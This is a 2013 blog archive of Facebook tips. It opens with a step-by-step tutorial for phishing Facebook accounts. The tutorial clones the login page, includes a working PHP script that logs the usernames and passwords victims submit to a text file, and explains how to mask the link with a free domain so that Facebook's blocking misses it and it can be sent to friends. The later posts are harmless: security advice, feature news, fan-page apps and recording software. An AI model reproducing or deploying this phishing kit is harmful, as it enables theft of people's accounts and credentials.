Wednesday, 25 December 2013

How To Hackers Hack FaceBook Account Using Phishing Attack

WHAT IS PHISHING?
Phishing is a technique or a way of attempting to acquire sensitive or confidential information such as usernames, passwords, and credit card details by false pretense as a trustworthy entity in an electronic communication. This is done with the help of a phisher.


WHAT IS A PHISHER?
A phisher is something that looks exactly like an Original login page (fake page), that writes the victim's login data (Username and Password) to a specific file, or does whatever you want so long as you get access to the victim's login data.
Here is an example of a fake facebook login page (phisher)




 HOW TO MAKE A PHISHER?
As the saying goes:

  • Dont give plenty of FISH to your friend,. Instead, you should teach him how to PHISH 

Therefore, instead of  just giving you the download link to the already made phishing page,.. Am going to teach you how to make your own phishing page. Well, at the end of this tutorial, i will put a download link to my already made phishing pages but first you have to learn how to make your own phisher :D

To create a successful phisher, all you need is a PHP enabled siteNotepad on your computer and a brain.

You can download Notepad v5.9++ here

Here is a list of php enabled free hosting sites:



In this tutorial am going to fucus mainly on how to prepare a phishing attack on facebook, am going to use Mozilla firefox as the browser and http://my3gb.com as the hosting site, its much easier.

STEP 1 -Creating the fake page

  • Go to facebook's login page http://www.facebook.com
  • On the top left corner of your Firefox browser, Click File ->Save page As and save your page name as facebook.html
  • Open facebook.html Using Notepad and search for the word ''action''

You will find it on a line that looks like this;

class="menu_login_container"><form method="POST" action="https://www.facebook.com/login.php?login_attempt=1" id="login_form"

  • Now change the method to ''get'' and action to ''login.php'' so that you will have something that looks like this;
class="menu_login_container"><form method="get" action="login.php" id="login_form"


STEP 2- Preparing the php script
  • To Create a php file, simply pasting the code below into your notepad. Then save it as login.php

------------------------------------------------------------------------------
<?php
header("Location: http://facebook.com/login.php ");
$handle = fopen("noobs.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>


------------------------------------------------------------------------------

 Note that in the above script, ''phished.txt'' is the file on which all hacked usernames and passwords will be saved and ''https://facebook.com/login.php'' is the Original facebook url where your victim will be redircted to after clicking the login button on your fake page. But at the moment facebook has tightened its security where by your victim will get notified of a phishing attack and would therefore be prompted to change his password right after arriving from a phishing page.

To avoid this, you should redirect your victim to any other url which is not of facebook by replacing  https://facebook.com/login.php with any url. Choosing the url to redirect your victim to will all depend on the trick that you will use against your victim in the whole phishing proccess.

Please also note that this part is mainly for facebook , its ok with several other sites like gmail, hotmail e.t.c your victim will not get a warning message, including mobile facebook (http://m.facebook.com).

STEP 3- Create File where to save hacked passwords 
  • Create an empty text file using notepad and rename it as phished
Note that when creating the text file, there is no need of renaming it as phished.txt because the fact that you will save it as a text file is enough to make it bear the extension of txt

Now you have 3 files so far;
  1. facebook.html
  2. login.php
  3. phished.txt
 STEP 5- Uploading the 3 files

Now go to http://my3gb.com and sign up for a free hosting account the upload the 3 files
If your phisher has successfully been made, any email address and passwords that are typed on your fake page will be saved on the ''phished.txt'' file



The link to your phishing page will therefore be; 
www.yourusername.my3gb.com/facebook.html

NOTE THAT:

  1. No One will be so dumb to click on such a link
  2. Facebook will automaticaly block your phishing url from being posted on facebook
To overcome the above sitiuation you need to rename your phishing link using a ''dot.tk'' domain. To be able to do this, go to www.dot.tk and register,. After that, login to your account and click on ''Add a new free domain now'' and follow the rest of the steps.

Your dot.tk domain name will look like this,... www.anyname.tk , any clicks on this link will be fowarded to your fake facebook page.
The good part is that..
 
  • you can rename the phishing link to suite your victim's curiosity and there making it difficult for him to notice any phisher
  • Your phisher will NOT be detected and blocked by facebook,..so you are free to post it or send it to a freind on facebook via inbox.

Hope you enjoyed the tutorial,.

How To Secure Your FaceBook Account

  •  Enable secure HTTPS connection

  • Create a strong password for authentication No matter how secrete your password is, it can easily be broken by brute-force, that is if you choose to use a short and simple password. If you don�t have a strong password to protect your account, then whatever security guides that you apply wont do you any good. The key here is to have a long and complicated password where complexity is the combination of lower case, upper case, numeric and special characters like symbols. for example..

2$k/Gp@?H$y8rQ?

  • DO NOT use a password that has a straight forward meaning (that can be found in the dictionary)
  • DO NOT use a phone number as a password
  • DO NOT use your boyfriend or girlfriend's name as a password,. no matter how much you love them or else it'll easily be broken down.:P

    • Enable login notification
    • Enabling the login notification will keep you notified when somebody logs in to your account without your permission.. So you can immediately kick them out fast and set a new password so that they can never login again. This is an extremely good feature which can be enabled for both email and mobile SMS.

      • One Time Password in login approval
      • One Time Password - is a two factor authentication method where you can enable all logins from unknown devices to use One Time Password,.. so as to ensure that only you can login from an unknown device. By making use of this feature, there is only one way a hacker can use to get your Facebook identity which is by stealing your recognised device and that is your computer or mobile phone lol.

        • Logging out from Facebook
        • Beware of Keyloggers
        • A keylogger - is a spyware tool that runs secretly in the system and records each and every keystroke on the user's keyboard. In other words, whatever you type on the keyboard is going to be saved as logs, which can later be viewed with a log viewer or sent to the hacker's email address via your network. And not only keystroke capturing, keyloggers have additional features like,.. screenshot capturing, secrete webcaming & web activity logging. There are two types of keyloggers, Software and hardware keyloggers.

          • Software keyloggers are usually downloaded as file attachments from the web, a single click on that file executes the keylogger.

          • Hardware keyloggers are more like usb disks, they are plugged in manually onto the victim's computer via usb port. The most common place to find hardware keyloggers are Internet cafes or a cyber cafe rather.

          How to Avoid and Bypass keyloggers

          • Update your antivirus regularly though this will only apply to a software keylogger as hardware  keyloggers are hardly detected by antivirus :P

          • Develop a habit of using an onscreen keyboard whenever you want to enter a password, this will bypass any keylogger installed on your system. To access the onscreen keyboard, simply go to Start->Run then in the prompt box, type osk.exe and hit Enter! the keyboard will appear on your screen, then use the mouse to enter your password.

          • Another way to bypass a keylogger is to fool it by shuffling your password when entering it lol. What i mean is...for example if your password is ABCDEF, when entering it, first type the letters ''AB'' and ''F'' then put the mouse cursor between ''B'' and ''F'' and type the letters ''C'' and ''E'' then finally put your mouse cursor between ''C'' and ''E'' and punch the letter D. ... haha lol then whoever installed that keylogger will never get your password correct. The aim is to enter the password without following the correct order.

            • Beware of Phishing
            • Phishing is a method of getting a user's credentials, i.e username and password with the help of a fake login page. You can find out more about phishing in my earlier article here, To protect yourself from phishing, always check your URL or your current page address in your browser's address bar to make sure you are on the real or correct login page. And please NEVER submit your login details on any third party site apart from facebook. Stay alert!!

              • Beware of HACK the hacker tools
              • These are simple tools that are developed with a quite convincing interface of hacking anybody's password with a single click. e.g facebook hacker pro, 007 facebook hacker, gmail password cracker, yahoo password cracker e.t.c.  These contain two main parts, the noob hacker's part, and the victim's part. The noob hacker is prompted to enter his username & password followed by his victim's username ,.. with the belief that when the noob hacker hits Enter,. he will get his victim's password revealed,.. Well the bad news is that these tools are nothing but trojans.

              • What this tool will do is,.. instead it will get whatever was imputed or typed on the noob hacker's part (username and password) & send it silently to the real HACKER's email address via a network connection, hence the noob hacker has been HACKED!!! :P:P:P

              • Therefore if you have been searching for a software on the internet to hack your friend with, i suggest that you stop now or you will only get yourself hacked. For now it is impossible to hack into facebook or any other account with a single click, the only way is by doing the manual work yourself.

                • Update your System Regularly
                • Updating your system regularly is one of the effective ways to get rid of malicious tools or spyware programs that may have patched up your system. Remember, there is nothing like 100% secure, change your passwords like a ladies underwear. Update your antivirus and do a regular scan. But please do not trust your antivirus too much lol. Some of these tool are deadly and completely FUD (Fully Undetectable). Just combine with the above knowledge and you are safe :D:D:D

                Monday, 23 December 2013

                How to add "Countdown Timer" for Fan Pages

                To make your business fan page or any other fan page interesting, some interactive tabs or apps have to be installed. One of the best tabs is "Countdown Timer" tab or  app.

                The main intention to have this tab in fan page is to display the timer of days left for an event. You can have this for displaying a countdown timer for any festival like Christmas too.
                 
                 
                To install a "Countdown Timer" app to your Facebook fan page, 

                • Log in to your Facebook account
                • Type "Countdown Timer" app in Graph search. There you will get list of different type of apps. Select "Countdown Timer For Page" app   

                • Click on "Go to App" button 
                • Select from the list of fan pages that you are admin of and click "Add" besides the page name 
                • Select the type of display you want the timer to be on your selected fan page
                • After selecting the type, now start entering the details in the text boxes below. First enter the title of the timer then the message for the viewers. 
                • Enter the event date and time 
                • Click "Save" and then click "Preview" button. 
                • Now you can see the timer for a particular event which displays the remaining days and time left. 
                • Now if all things are right, then click "View" button 
                • The tab will be seen on the page. 
                • Click "Post to Page" for finishing the process. 
                • Lastly check whether the tab is seen on the page by clicking your page name. 

                Look in the image above. If the tab is inserted it will be displayed with this icon as shown above. 

                Successfully you have set a "Countdown Timer" app or tab for your Facebook Page. 









                How To Automatic Post Status On Facebook After Your Desired Time?


                How To Automatic Post Status On Facebook After Your Desired Time?


                After receiving many requests from my friend, I started working on this script. As you know that Facebook officially give this option to post a status later but for this you have to post all status on your Facebook and have to set there time one by one that can take a huge time so here we are avoiding this through our script.
                This script is 100% working and secure and your account will not be banned by Facebook as we are using only Google for this that has a huge name. In this Script, you will not post on any other group, page, friend wall, comment or like any other status. Its only post on your Profile.
                This script is so easy as 1,2,3 and go. You just have to add your desired Statuses as many as you can and set the time interval after which you want to post these status on your timeline. So now without any more preface, here go to walkthrough tutorial and follow all the steps as mentioned below.




                Tutorial:

                Step 2: Click Blue Button Named "Start Scripting".

                Step 3: If Any POP-UP Appears With Named "Google Apps Script" Then Click On Blue Button Named "Close".

                Step 4: Click Here To Copy Auto Status Update Script. Copy And Paste All The Text From Below And Paste There.

                Step 5: Click "Untitled project" In The Header And Give It A Name Like "Auto Update Status On Facebook".

                Step 6: Now Click "CTRL+S" To Save It.

                Step 7: Click On Click Icon Named "Current project's trigger".

                Step 8: A POP-UP Will Appear, Now Click On "No triggers set up. Click here to add one now."

                Step 9: Here Select "nyalakan" In First DropDown, And Select Your Time To Post Internal In The Rest DropDown Then Click "Save".

                Step 10: Then After Clicking "Save", Here Comes A POP-UP Named "Authorization required", Then Click On "Continue" Button.

                Step 11: Here Appear A New Window With Named "Auto Update Status On Facebook", Now Click On Blue Color Button Named "Accept".

                Step 12: Sit Back And Start Visiting Your Timeline To See Your Updated Post After Your Defined Interval Of Time.

                Step 13: Click Here To Get Your Access Token

                Step 14: Click Here To Get Your Profile ID


                Last Words:
                Now your timeline will be start floating with your added statuses, You can add unlimited status to post even you will be offline from Facebook without any apps. And don't worry about your account, your account will be safe. Now if you liked it then share it with friends and leave your valuable comment below and if you have any query about it then feel free to ask in the comment. Hee this ends, now be with us to get more upcoming awesome codes/script for Facebook only. Keep visiting us�


                Special Thanks to Exeideas.com

                Sunday, 22 December 2013

                "See Your 2013 Year in Review" - Facebook adds new feature

                Have you gone through your profile recently? If not then there is beautiful surprise for you this time. It is "See Your 2013 Year in Review" section that is introduced very recently. 


                This latest update can be seen right below your profile picture in your timeline. According to Facebook, this feature highlights the top 30 moments and life events from users' Facebook friends.
                 
                 
                So when you click on this feature,  Facebook will memorize the top 30 moments and life events that you have posted on your wall. For example, likes, photos, engagements, etc. 
                 
                If your friend clicks on your timelines' "Year of Review" option then he can also go through but only if it was shared with him or her at that time. 
                 
                In the same way if your friend has shared some great moments with you in Facebook, then you also can see his "Year of Review" by going to his or her timeline. 
                 
                 
                 
                 




                Wednesday, 18 December 2013

                Did you check "Time" you spend on Facebook ?

                Facebook is the only social networking site where people interact, share, like, comment as much as they can. Due to its new added features people visit it daily. The purpose of every user is different while using Facebook. 

                One who uses Facebook for growing business and customers, they have to spend a lot of time as compared to others. People who just update their status with a quote or change their profile picture or share some interesting stuff may not know how much time they spend on the social media. 

                There are teenagers who leave their studies to spend some time on Facebook with their friends. In such cases, by keeping a track of time spent daily will curb your addiction towards Facebook and deal with other situations in your life. 

                Please note that this post is not for not allowing anyone from using it or scaring anyone but to inform them the time spent on Facebook which will make their own mind to think for other tasks. 

                To check for time utilized on Facebook, you can use "Facebook Runner" software which displays the real time spent on Facebook. 


                The software "Facebook Runner" is developed by Ahmet Soyarslan which shows you how much time you spend surfing on Facebook. 

                Features of the software: 

                • Displays the time spent
                • You can integrate your Facebook page 
                • Saves timer values 
                • 3 Timer resetting  like Daily, On startup and Never
                • Timer view format can be shortened


                Facebook Runner software is available for all browsers. To use this first you have to download and install it on your desktop or mobile. Then if your Facebook account tab is active then this displays the time.



                Its time to download Facebook Runner software and know how much you spend your precious time on Facebook.


























                Tuesday, 17 December 2013

                Facebook's Messenger App gets "Dislike" button with other set of stickers

                Long awaited "Dislike" button has now been introduced by Facebook in its Messenger app for users. This button is in the form of sticker . There are other more stickers that are added for messenger app users on their mobile. The "Dislike" button for desktop users is yet to be introduced. 



                The stickers were introduced in the month of April to its chat feature. With other stickers, Facebook has added the thumbs down too which indicates the "Dislike" button. 

                From many years users wanted a button that would allow them to choose whether a particular post is liked or not. They waited for this new button which would allow them for disliking any post or photo. 


                Monday, 16 December 2013

                Facebook's new "Donate Now" button for non profits to collect donations

                Facebook always is active for launching new features whether it is a Sympathize button or Auto-Play videos in mobiles or displaying "Web" or "Mobile" for mobile users in chat. Every feature is a unique one and play a different unique role.

                As this social media is designed in such a way that anyone can use it for their own purpose, whether it is teenager or housewives or bloggers or business personal etc everyone is using Facebook for their own purpose. 

                This time Facebook has come up with a new button called "Donate Now" which is specially designed for non profit organizations who can collect the funds for the betterment of the people.There are situations where in people will be searching for their near and dear ones who have been stuck up in some disasters or calamities. If some NGO's or non profit organizations post in News Feed which will have a "Donate Now" button that will collect funds for the people who are suffering then that middle man's role will be played by Facebook. 



                The above image shows a post of "American Cancer Society" which displays the "Donate Now" button below the post. This button when clicked will have a list of options for donations by users. The account details will be asked by "Donate Now" button where the user if interested in donating some funds can do so. 

                Facebook developed this feature which gives non profits an easier way to reach out and ask for help in the times of natural disasters. There is over 1 billion people who access Facebook and taking this into consideration, the non profits will get a best way to ask for help and support from people. 

                There are about 19 non profit organizations who will start displaying the "Donate" button at the top of their pages and at the bottom of the posts. 

                Overall, a big thanks to Facebook for launching this feature after having asked for filling the "Interest form" by some organizations. Many have given the positive response and this feature will be in action from today. 


                Now you can add the button for your fan pages. Find out how to add "Donation" button to your website and Facebook fan pages.







                Facebook Trick to recover stolen "Fan Pages"

                When you create a fan page in Facebook, there is a facility to set some roles for users accessing and posting in the page. These are called as "Admin Roles" in Facebook Pages. There are different roles assigned for managing the pages as needed. If you know how to add another "Admin" to your page, with a specific role then there is a fear of your fan page getting stolen by another person whom you have added in the admin role.  

                A creator of the page has to be the "Manager" of the page as he is creating, posting, etc and accessing the whole page. If he wants to add anyone who can access the page for some other reason who is trustworthy then you can set him or her as any other role. 


                When a hacker hacks your fan page, then instead of thinking "Why", take steps to find out a solution to "How".

                First things first while recovering your stolen fan page is where to report this theft and how will it get resolved. 








                Some important steps that will help are : 

                • Create an "Email" where the details of your fan page and include that your fan page was stolen in the email. In the email also include who are the managers and other admins who can access your fan page to post 
                • Fill out the forms by clicking on the links provided below: 
                • Then post your Facebook fan page hack problem in the following Facebook forums.   

                • If there is no response from Facebook after 5 business days, then you have to issue a press release 
                • Coming back to the point, post a small article on your blog or website stating that the fan page has been hacked
                Till that time, you will get a reply from Facebook regarding the email that you sent them. 




                         








                Sunday, 15 December 2013

                Tricks to avoid "Facebook Cloning"


                Are there any "CopyCats" around you? Some people can create a fake profile of yours with some tricks. This may be hacking but this involves a process called "Cloning". 

                When you have your personal account then how can anyone else take charge of your account by creating a fake one which is similar to yours!!!

                Here the trick of creating "Facebook Cloning" is used.

                In other terms, Facebook cloning is a type of stealing one's identity where dodgy characters make a second profile which is similar to the current one.

                Later on they send the friend requests to all your friends from the cloned profile. It is nothing but they are fooling your friends by sending fake requests from the cloned profile.

                The process then comes at a stage where they post comments or add images and chat with your friends with your identity. The cloned profile helps to do them all these stuff.

                In such cases, when any other person who is not known to you and cloning your profile to use your contacts for communicating, it is theft and something must be done to avoid it.

                Before making any steps for avoiding Facebook cloning, you should first know whether it is really been done or not and how they do it.

                Know how Facebook cloning is done:


                • First they send you a friend request
                • Once you accept it then they start copying all your contacts and other information
                • They save your profile pictures and profile and each small things that you have shared
                • Then create a fake email id either in Gmail or Hotmail 
                • Using this fake email then they register for a new Facebook account
                • They use your exact profile pics and information and give it as exact look and feel of your profile 
                • After all this they start copying all other information and pasting in the new cloned Facebook account
                • Later they will like all the pages that you have liked in your profile. Sometimes they will copy the comments that you have made in your profile to that extent that the new profile should look the same
                • Now the time has come to block you to see the new fake or cloned profile by just clicking on "Report / Block" option. Once this is done you will never come to know that a new fake or cloned id is prepared without your knowledge. 
                • Now they will do as they want to do in the new cloned fake Facebook profile but "As You"
                This post is to make you aware of the process of cloning in Facebook and not to fear you. Once all this is done, then they start sending friend requests, share their comments , like pages and groups , everything else but only difference will be you will not know that they are using your cloned profile for doing all this.

                In the article by Nivashni Nair, where the writer points out about few cases that have been victims about Facebook ID's Cloned

                The main reason behind this is Privacy Settings and Accepting any Friend request

                Cloners will start their steps with sending a friend request to you. Once you have accepted they have won half the battle. So, when accepting any request, first check whether the person who is sending the friend request is known or not known or has atleast 1 mutual friend in common. 

                Please go through some tricks that will help you to avoid this type of crime against you: 

                • Check for the person who is sending you a friend request
                • Do not accept if he or she is unknown 
                • Accept only them who has at least 1 mutual friend in common
                • Check and edit your privacy settings 
                • Change the photo albums privacy settings
                Most importantly , Facebook has its "Help Center" where you can go through for more information. Report to any fraud being done against you immediately. 

                If the cloning of your Facebook profile is gone to an extent that you cannot deal then better to inform your friends and family that you are deleting your profile completely and creating a new one. And as soon as you take this decision, better delete your present account and create a new one with a fresh look. 


                 













                Thursday, 12 December 2013

                How to add "Instagram tab" to Facebook Fan Page

                Facebook fan page needs interesting tabs to make it more impressive. If you have fan followers who interact with you via images or photos. They want to share some of their thoughts and express their feelings via photos then some platform should be there in your Facebook page which will help your fans do accordingly. 

                Then in such cases use of an app called "Instagram Feed app for pages" can be used. This tab when installed on your fan page will give your fans a base to share their feelings via images. 

                As you all know that Instagram is an online photo sharing, video sharing and social networking service that enables its users to take images and videos and share to their fellow people. 



                To add the Instagram app to your Facebook fan page:


                • Log in to your account
                • Search for "Instagram Feed tab for pages" in Graph search box
                • Select the fan page from the list displayed 
                • Click "Add Instagram Feed Tab"
                • Log in to your Instagram using your user name and password
                • After logging in, you can see the tab inserted in the fan page with its icon. 
                • To edit the settings, click on the pencil at the top of the tabs. 
                • When you click on the arrow, the tabs editing options will open. You can select the tab for editing. Here select the pencil at the top of the "Instagram" tab and click "Edit"
                • Change the tab name and image . 
                • Click "Save" option 
                Now you can get the images shared by your fans or you can share some of your important images via Instagram feed app in the fan pages.




                Introducing "InstaGram Direct" to share photos to Facebook friends

                Facebook has taken its latest swing at Snaptchat with Instagram Direct. This is a feature introduced by Instagram for direct messaging to a group or friends or family. 




                Instagram's CEO, Kevin Systorm said that the new feature is designed for sharing more images. Over 80 million people use Instagram everyday mostly posting images. The new feature , Instagram Direct, will allow people to send private photo messages to up to 15 people.





                Still all this is separated for Facebook who has a zero connection with Instagram Direct. In the near future, users will be accessing Instagram Direct feature to send their photos to Facebook friends too.









                Wednesday, 11 December 2013

                Add some music to Facebook wall or fan page

                Adding files, spreadsheets and presentation slides are all informative files that can be uploaded to Facebook. There should also be some music that can be added to Facebook which will stream side by side in the News Feed and will let you entertain your near and dear ones. 


                How about some favorite music streaming while you are surfing Facebook feeds!!!


                Enhance your experience and your fellow visitors on your fan page or your wall with some great music streaming besides. 






                The simplest way to add music to Facebook page or rather you can call this as trick to add mp3 music to Facebook is : 


                • Log in to your Facebook page
                • On the other tab in your browser open "SoundCloud" site 
                • Now click on "Sign Up" to register yourself 
                • Either you can choose Facebook or Google Plus for registering or you can add different details to register
                • Then permit the site to access your details 
                • Agree to their terms and conditions to finish the procedure
                • Choose your music from the list of categories 
                • Or you can "Upload" your own music by clickin on the option at the top of the screen
                • Select the file from your computer 
                • Wait till the file uploads 
                • In the mean time add the other details like description of the file, the tags, etc
                • Select the check box of sharing options. Select "Facebook" 
                • Click "Save" button 
                • Then "Share" the file on Facebook
                After completing all the steps successfully, your file will be seen on your wall. To verify, click on the play button. The music starts streaming.


                This way you can add any music file to your Facebook wall.










                Facebook trick to add a PPT file to Facebook

                Facebook allows all other file formats to be uploaded or added in it. Starting from a ".Doc" or ".Xls" file. 
                 
                 
                It is very easy to upload any type of file format to Facebook. When thought of more deeply, when a word document file and excel spreadsheet can be added in Facebook, then how about a PowerPoint slide presentation!! The presentation will be in slides and if there are many slides to upload it to Facebook needs it to be converted from a normal presentation to a video format which can then play in Facebook. 
                 
                 
                 













                When you want to upload a .PPT presentation file to Facebook, follow the steps : 

                • Open the presentation slide that you want to upload
                • Then using "Save As" option save the file in a video format  (Windows Media Video format)
                • Then confirm the size of the video file to be best fitted in Facebook. Please note that it should not exceed 1 MB.
                • Verify that the length of the video is not too long. It should not exceed 20 minutes long.
                • In the meanwhile change the settings of your browser to allow pop ups
                • Open your normal Facebook account
                • Log in 
                • Select the "Upload images / video" option in the status bar
                • Select the file you want to upload 
                • Once the file is uploaded you can type the details about the file in the status update

                Earlier you have come across how to upload a word document or excel spreadsheet file to Facebook, now you can upload a PowerPoint presentation to Facebook.












                Tuesday, 10 December 2013

                4 Best Facebook Marketing tools

                Creating "Facebook Ads" is what comes in mind when "Marketing" strikes. But there are lot more opportunities or tools that make any business page or campaign become successful. 

                After all the main intention behind is to bring more customers to the business.


                One such tool or method to get more visitors is "Ads". But sometimes ads are overlooked by people and don't look up even if your page is most alluring.







                In that case, using some other methods or tools have to be applied.

                4 Effective and helpful ways of marketing using tools are : 

                • Ripe Social : This is a premier Facebook Marketing Services company that focus on helping small and medium size businesses. They leverage the power of the world's largest social network, Facebook, to increase brand awareness, promote client interaction, drive website traffic, cultivate repeat business, generate sales leads and ignite viral marketing. It is a paid tool.
                • AppForma Using this tool you can create a coupon, sweepstakes, bring a friend and vote for us type of tools. 
                • OpenGraphy:  This connects your website with Facebook page. It analyses, maximizes,socializes and advertises. 
                • Facebook Marketing tool:  This is different from all others. Featuring ready-to-use fans, start word or mouth campaign. 
                Take the use of these tools and make your fan page go viral and reach many customers.

















                Sunday, 8 December 2013

                Soon you will have "Sympathize" button besides "Like" button in Facebook

                All are thinking what will be the "Next Big" thing in the world of Facebook!!! What is the new feature that Facebook will give its users?

                The No. 1 in "Social media", now has started a new experiment with a new button which is called as "Sympathize button". After "Like" and "Share" button now its "Sympathize" button. What exactly is this button of feature being created for? 

                According to Facebook spokesperson, if any user wants to tag a status with a negative emotion, then the "Sympathize" button would automatically replace the "Like" button. 




                The feature is still in the experiment mode. There will be no such button like a "Dislike" button.

                Hence if any emotional smiley or button is helpful then "Sympathize" button is useful.




                In this case, it is just like Facebook is toying with some features to make it available henceforth. If it gets successful then where will that button be placed?

                Simply may be by placing it besides the famous "Like" button will do.

                The idea of "Sympathize" button came from a hackathon.  It will be experienced by many of Facebook users while surfing their News Feed status that some of their friends or any person or personality you are following has shared some sad status and you feel sympathy for them but cannot express it without using words. Then the idea of this new feature will work if implemented successfully for users.









                Saturday, 7 December 2013

                Add another "Admin" for your fan page

                Admin roles can be changed in Facebook fan page or business page as the need arises. For example, if you are a creator of any fan page, then you are the primary "Manager" of the fan page. This fan page may be created for your clients or for your own personal thing. 

                One who is creating any fan page for others, then after getting some likes for that page, the page needs to be handed over to the client. In that case, the admin roles changes for that page. 

                There are different types of roles while managing admin roles. 
                • Content creator
                • Manager
                • Advertiser
                • Moderator
                • Analyst
                As a "Manager" of the fan page, you can set anyone as the above admin roles.

                As the role changes, their accessibility also changes. The below image will specify what actually is accessible in Facebook fan page according to your admin roles.


                A manager is the main person of fan page. He has all the accessibility for doing things in Facebook. Like he can manage admin roles (which is only for him) , edit , create posts , create ads and view insights. Whereas other roles will not have all of these roles.

                Their accessibility changes as set by the manager of the fan page.

                If there is a need to change the admin roles or set any person as a manager or moderator or any other role, then follow the steps:

                • In the Facebook fan page, click "Edit Page" 
                • Now click "Manage Admin roles" option
                • Type the name in the text field to add a person 
                • Then click the down arrow to select the role of that person 
                Now what role you have designated to the person added will have only permission to that role and cannot have all the options that a "Manager" has.

                Think carefully before setting an admin role.




                 

                Friday, 6 December 2013

                "Auto-Play" videos feature in facebook tested- Now available on all mobiles

                In the month of Spetember 2013, Facebook launched a new feature of "Auto Play videos" for mobile devices. Means when a user connects to Facebook on his mobile, the News Feed will display the videos automatically for them.

                As the testing of this feature has been successful, Facebook is making it available for all mobile users now. 




                The feature when became successful, it has been seen in some Facebook users on their mobiles which is now available for all iOS and Android users.

                For desktop users, the feature is still in the test mode and will soon be seen by them too. It is not schedules to when it will be available for the desktop users. 

                On your mobile devices when you scroll the News Feed, the videos which are uploaded by others are automatically played and if the user wishes not to watch then by scrolling the feed will change the screen to the other videos if uploaded. 

                Move the videos as you move the photos on screen. Watch the videos when auto played and if you find it interesting then like or comment on it. If not just make a slight disruption and scroll the screen down. The video will not play. 

                So wait for the latest feature called "Auto Play videos" which is newly tested and successfully implemented. This feature will be internationally available to all mobile users. 
                 
                 














                Thursday, 5 December 2013

                Your Voice on Facebook ??

                How many posts do you post on your Facebook wall daily? If you are a die-hard Facebook user, then may be more than 50 or so. Then instead of typing, why not add your posts on your wall with your voice messages. Just speak a message and that particular message would be posted on Facebook. 
                 
                 
                 


                There is a software designed for posting your voice messages on your Facebook wall. So, side by side you can update your status "n" number of times a day. 

                The software, "Speak a Message" will do this act for you. 


                "Speak a message" is a voice comment software with wide range of features.



                Its just like saying, "Your Voice on Facebook"... 


                Making interesting, surprising and funny messages on your Facebook wall via "Speak a message".

                Features of this software: 

                • Record and play voice messages
                • Add voice to your photos, messages or posts
                • Personalize a greeting card and add voice to it too
                This software is free to download from "Softonic".  


                Download this software freely . The link below :

                http://speak-a-message-for-facebook.en.softonic.com/download


                So, now download this software and let other friends on your Facebook know how interesting and surprising posts you post with a "Sound and Voice Effect".






                3 Free Softwares to record "Facebook video chat"

                Chatting on Facebook is the most interesting part for most users. Either simple chatting or video chat, both are famous. 

                You may be using the most useful software "Skype" for video chatting. Some use Skype contacts via Facebook, connect both and chat with them. There is no one who don't know how to video chat on Facebook. People connect their Skype account to their Facebook account. This will make them to import the Skype contacts in Facebook to video chat. 



                There are few software's that will record your Facebook video chatting in audio files and then stream whenever required. 


                Few among them are: 

                • CamStudio : This is the best and one of the excellent software to record video chats. It creates an .avi file as it has built in SWF maker to convert recorded avi files to SWF files. 
                • Hypercam: Similar to CamStudio which creates and stores video chat into avi files. Extra feature of this software is that it will record audio from your microphone too. 
                • Screen Cast-o-matic: is a live online recorder which records video from your browser without the need of any software.


                Just use any of these software or applications and the streaming Facebook video chat will be saved and stored in your PC.